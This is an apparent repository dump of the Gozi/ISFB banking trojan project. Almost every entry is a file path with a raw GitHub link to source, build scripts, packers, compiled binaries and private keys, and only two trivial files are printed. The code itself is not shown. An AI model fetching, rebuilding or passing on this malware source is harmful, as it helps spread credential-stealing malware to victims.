https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/startup.c -------------------------------------------------------------------------------- /client/transfer.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/transfer.c -------------------------------------------------------------------------------- /client/transfer.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/transfer.h -------------------------------------------------------------------------------- /config.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/config.h -------------------------------------------------------------------------------- /config.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/config.txt -------------------------------------------------------------------------------- /crm.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crm.h -------------------------------------------------------------------------------- /crm.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crm.rc -------------------------------------------------------------------------------- /crm.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crm.vcproj -------------------------------------------------------------------------------- /crm_b.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crm_b.rc -------------------------------------------------------------------------------- /crm_dbg.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crm_dbg.rc -------------------------------------------------------------------------------- /crm_u.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crm_u.rc -------------------------------------------------------------------------------- /crypto/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/ReadMe.txt -------------------------------------------------------------------------------- /crypto/aes.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/aes.c -------------------------------------------------------------------------------- /crypto/b64.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/b64.c -------------------------------------------------------------------------------- /crypto/blowfish.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/blowfish.c -------------------------------------------------------------------------------- /crypto/crypto.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/crypto.c -------------------------------------------------------------------------------- /crypto/crypto.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/crypto.h -------------------------------------------------------------------------------- /crypto/crypto.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/crypto.vcproj -------------------------------------------------------------------------------- /crypto/cryptstr.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/cryptstr.c -------------------------------------------------------------------------------- /crypto/des.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/des.h -------------------------------------------------------------------------------- /crypto/des_enc.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/des_enc.c -------------------------------------------------------------------------------- /crypto/des_locl.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/des_locl.h -------------------------------------------------------------------------------- /crypto/deskey.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/deskey.c -------------------------------------------------------------------------------- /crypto/global.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/global.h -------------------------------------------------------------------------------- /crypto/md5.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/md5.h -------------------------------------------------------------------------------- /crypto/md5c.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/md5c.c -------------------------------------------------------------------------------- /crypto/md5lib.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/md5lib.h -------------------------------------------------------------------------------- /crypto/ncbc_enc.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/ncbc_enc.c -------------------------------------------------------------------------------- /crypto/nn.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/nn.c -------------------------------------------------------------------------------- /crypto/nn.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/nn.h -------------------------------------------------------------------------------- /crypto/prime.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/prime.c -------------------------------------------------------------------------------- /crypto/prime.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/prime.h -------------------------------------------------------------------------------- /crypto/r_keygen.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/r_keygen.c -------------------------------------------------------------------------------- /crypto/r_random.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/r_random.c -------------------------------------------------------------------------------- /crypto/r_random.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/r_random.h -------------------------------------------------------------------------------- /crypto/rc4.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rc4.c -------------------------------------------------------------------------------- /crypto/rc4.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rc4.h -------------------------------------------------------------------------------- /crypto/rc6.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rc6.c -------------------------------------------------------------------------------- /crypto/rc6.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rc6.h -------------------------------------------------------------------------------- /crypto/rsa.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rsa.c -------------------------------------------------------------------------------- /crypto/rsa.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rsa.h -------------------------------------------------------------------------------- /crypto/rsalib.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rsalib.c -------------------------------------------------------------------------------- /crypto/rsaref.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/rsaref.h -------------------------------------------------------------------------------- /crypto/serpent.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/serpent.c -------------------------------------------------------------------------------- /crypto/serpent.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/serpent.h -------------------------------------------------------------------------------- /crypto/sha1.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/sha1.c -------------------------------------------------------------------------------- /crypto/sign.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/sign.c -------------------------------------------------------------------------------- /crypto/spr.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/crypto/spr.h -------------------------------------------------------------------------------- /cryptor/CRM.ICO: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/cryptor/CRM.ICO -------------------------------------------------------------------------------- /cschar.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/cschar.c -------------------------------------------------------------------------------- /desktop.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/desktop.c -------------------------------------------------------------------------------- /dll.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/dll.c -------------------------------------------------------------------------------- /dll.def: -------------------------------------------------------------------------------- 1 | LIBRARY "crm" 2 | EXPORTS DllRegisterServer 3 | 4 | -------------------------------------------------------------------------------- /dll.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/dll.h -------------------------------------------------------------------------------- /dll.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/dll.vcproj -------------------------------------------------------------------------------- /dname.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/dname.txt -------------------------------------------------------------------------------- /dname/dname.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/dname/dname.cpp -------------------------------------------------------------------------------- /dname/dname.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/dname/dname.vcproj -------------------------------------------------------------------------------- /dname/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/dname/stdafx.h -------------------------------------------------------------------------------- /encrypts.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/encrypts.bat -------------------------------------------------------------------------------- /exe.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/exe.c -------------------------------------------------------------------------------- /format.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/format.txt -------------------------------------------------------------------------------- /id.h: -------------------------------------------------------------------------------- 1 | #define g_Version 1000 2 | -------------------------------------------------------------------------------- /install.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/install.c -------------------------------------------------------------------------------- /isfb.sln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/isfb.sln -------------------------------------------------------------------------------- /masm64.rules: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/masm64.rules -------------------------------------------------------------------------------- /ntdll.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ntdll.h -------------------------------------------------------------------------------- /pack_dll.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/pack_dll.bat -------------------------------------------------------------------------------- /pack_exe.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/pack_exe.bat -------------------------------------------------------------------------------- /private.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/private.key -------------------------------------------------------------------------------- /private.key.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/private.key.txt -------------------------------------------------------------------------------- /public.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/public.key -------------------------------------------------------------------------------- /public.key.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/public.key.txt -------------------------------------------------------------------------------- /release(builder)/client.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/client.dll -------------------------------------------------------------------------------- /release(builder)/crm.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/crm.dll -------------------------------------------------------------------------------- /release(builder)/crm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/crm.exe -------------------------------------------------------------------------------- /release(builder)/dname.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/dname.exe -------------------------------------------------------------------------------- /release(builder)/private.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/private.key -------------------------------------------------------------------------------- /release(builder)/private.key.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/private.key.txt -------------------------------------------------------------------------------- /release(builder)/public.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/public.key -------------------------------------------------------------------------------- /release(builder)/public.key.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/public.key.txt -------------------------------------------------------------------------------- /release(builder)/rsakey.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/rsakey.exe -------------------------------------------------------------------------------- /release(builder)/zconv.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/release(builder)/zconv.exe -------------------------------------------------------------------------------- /resource.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/resource.h -------------------------------------------------------------------------------- /testconf.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/testconf.bin -------------------------------------------------------------------------------- /testconf.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/testconf.txt -------------------------------------------------------------------------------- /upack_dll.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/upack_dll.bat -------------------------------------------------------------------------------- /x64/release(builder)/client.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/x64/release(builder)/client.dll -------------------------------------------------------------------------------- /zconv.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/zconv.txt -------------------------------------------------------------------------------- /zconv/zconv.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/zconv/zconv.c -------------------------------------------------------------------------------- /zconv/zconv.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/zconv/zconv.vcproj --------------------------------------------------------------------------------